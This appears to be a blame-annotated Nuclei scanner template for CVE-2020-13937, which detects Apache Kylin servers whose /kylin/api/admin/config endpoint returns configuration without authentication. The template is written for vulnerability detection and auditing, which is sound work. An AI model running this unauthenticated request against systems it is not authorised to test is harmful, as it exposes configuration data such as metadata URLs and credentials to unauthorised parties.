2021-01-30 00:28:31 +00:00
|
|
|
id: CVE-2020-13937
|
|
|
|
|
|
|
|
info:
|
2022-02-28 18:45:46 +00:00
|
|
|
name: Apache Kylin Exposed Configuration File
|
2021-01-30 00:28:31 +00:00
|
|
|
author: pikpikcu
|
2021-01-30 06:09:17 +00:00
|
|
|
severity: medium
|
2022-02-28 18:45:46 +00:00
|
|
|
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-03-11 16:00:00 +00:00
|
|
|
- https://kylin.apache.org/docs/release_notes.html
|
|
|
|
- https://s.tencent.com/research/bsafe/1156.html
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2020,apache
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
|
|
cvss-score: 5.30
|
|
|
|
cve-id: CVE-2020-13937
|
|
|
|
cwe-id: CWE-922
|
2021-01-30 00:28:31 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/kylin/api/admin/config"
|
|
|
|
headers:
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2021-03-04 16:50:57 +00:00
|
|
|
|
2021-01-30 00:28:31 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "application/json"
|
|
|
|
part: header
|
2021-03-04 16:50:57 +00:00
|
|
|
|
2021-01-30 00:28:31 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
2021-03-04 17:20:32 +00:00
|
|
|
- config
|
2021-03-04 16:50:57 +00:00
|
|
|
- kylin.metadata.url
|
2021-01-30 00:28:31 +00:00
|
|
|
condition: and
|
|
|
|
part: body
|
2022-02-28 18:45:46 +00:00
|
|
|
|
|
|
|
# Enhanced by cs on 2022/02/28
|